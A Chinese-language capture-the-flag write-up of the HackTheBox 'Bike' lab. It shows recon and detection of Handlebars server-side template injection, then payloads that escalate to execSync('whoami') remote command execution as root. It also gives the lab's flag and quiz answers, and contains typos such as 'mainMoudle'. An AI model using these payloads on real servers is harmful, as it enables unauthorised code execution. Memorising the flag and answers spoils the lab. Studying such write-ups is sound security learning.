HTB-bike(SSTI模版注入)
前言
- 大家好,我是qmx_07,今天给大家讲解bike靶场
渗透过程
信息搜集
- 服务器开放了 22 ssh 和 http80端口
Wappalyzer
- 介绍:Wappalyzer是一种浏览器扩展程序,用于识别正在访问的网站所使用的技术栈和工具,比如使用的web框架,编程语言等
- 服务器所使用Express框架
发现SSTI模版注入
- 可以看到这个输入框,用来输出 内容
- 尝试xss攻击失败
- 介绍:book.hacktricks.xyz 是一个在线技术知识库,提供有关黑客技术、网络安全和渗透测试的信息和资源,学习网络安全渗透知识
- 由于前面Wappalyzer 搜集到编程语言是Node.js进行尝试SSTI模版注入
- 输入{{7*7}}正确的返回值是49
- 服务器显示报错,信息显示使用的handlebars模版
- /root路径 可能拥有更高的权限
SSTI模版注入
- 使用hacktricks里handlebars模版的注入poc
- 对poc进行url编码,防止出现其他问题
- 显示require函数 无法被调用,可能做了一些安全限制,尝试绕过
{{#with "s" as |string|}}{{#with "e"}}{{#with split as |conslist|}}{{this.pop}}{{this.push (lookup string.sub "constructor")}}{{this.pop}}{{#with string.split as |codelist|}}{{this.pop}}{{this.push "return process;"}}{{this.pop}}{{#each conslist}}{{#with (string.sub.apply 0 codelist)}}{{this}}{{/with}}{{/each}}{{/with}}{{/with}}{{/with}}
{{/with}}
- process没有被禁用,尝试获取主函数
- 在Node.js中,process是一个全局对象,它提供了对当前运行的Node.js进程的访问和控制
{{#with "s" as |string|}}{{#with "e"}}{{#with split as |conslist|}}{{this.pop}}{{this.push (lookup string.sub "constructor")}}{{this.pop}}{{#with string.split as |codelist|}}{{this.pop}}{{this.push "return process.mainMoudle;"}}{{this.pop}}{{#each conslist}}{{#with (string.sub.apply 0 codelist)}}{{this}}{{/with}}{{/each}}{{/with}}{{/with}}{{/with}}
{{/with}}
- process.mainMoudle也可以调用,我们尝试间接调用require函数
{{#with "s" as |string|}}{{#with "e"}}{{#with split as |conslist|}}{{this.pop}}{{this.push (lookup string.sub "constructor")}}{{this.pop}}{{#with string.split as |codelist|}}{{this.pop}}{{this.push "return process.mainModule.require('child_process');"}}{{this.pop}}{{#each conslist}}{{#with (string.sub.apply 0 codelist)}}{{this}}{{/with}}{{/each}}{{/with}}{{/with}}{{/with}}
{{/with}}
- child_process模块提供了创建子进程的功能,可以通过该模块执行外部的系统命令
{{#with "s" as |string|}}{{#with "e"}}{{#with split as |conslist|}}{{this.pop}}{{this.push (lookup string.sub "constructor")}}{{this.pop}}{{#with string.split as |codelist|}}{{this.pop}}{{this.push "return process.mainModule.require('child_process').execSync('whoami');"}}{{this.pop}}{{#each conslist}}{{#with (string.sub.apply 0 codelist)}}{{this}}{{/with}}{{/each}}{{/with}}{{/with}}{{/with}}
{{/with}}
- execSync用于 命令执行相关函数
- 服务器返回了账号名root
- flag:6b258d726d287462d60c103d0142a81c
知识点讲解
- 介绍:SSTI(Server-Side Template Injection)是一种Web应用程序中的漏洞类型,攻击者通过在模板引擎中注入恶意代码来执行服务器端的任意代码
- 模版引擎是一种用于渲染动态内容的工具,常用于网页开发中的模板系统
- 危害:敏感数据泄露、服务器端命令执行、远程代码执行等
答案
- 1.服务器开放了TCP哪些端口?
22,80
- 2.http端口运行着哪个语言?
Node.js
- 3.web框架名称是什么?
Express
- 4.通过{{7*7}}这种形式验证的漏洞叫什么?
Server Side Template Injection
- 5.Node.js使用的模版是什么?
Handlebars
- 6.burp编码的选项卡叫什么?
Decoder
- 7.为了使用有效载荷,我们需要使用什么编码?
url
- 8.在使用什么函数时,服务器响应未定义?
require
- 9.在Node.js中最高的变量叫什么?
golobal(也就是全局变量)
- 10.使用载荷后,用户名叫什么?
root
- 11.flag是什么?
6b258d726d287462d60c103d0142a81c
总结
- 我们介绍了book.hacktricks.xyz 技术网站,以及ssti模版注入,相关函数的调用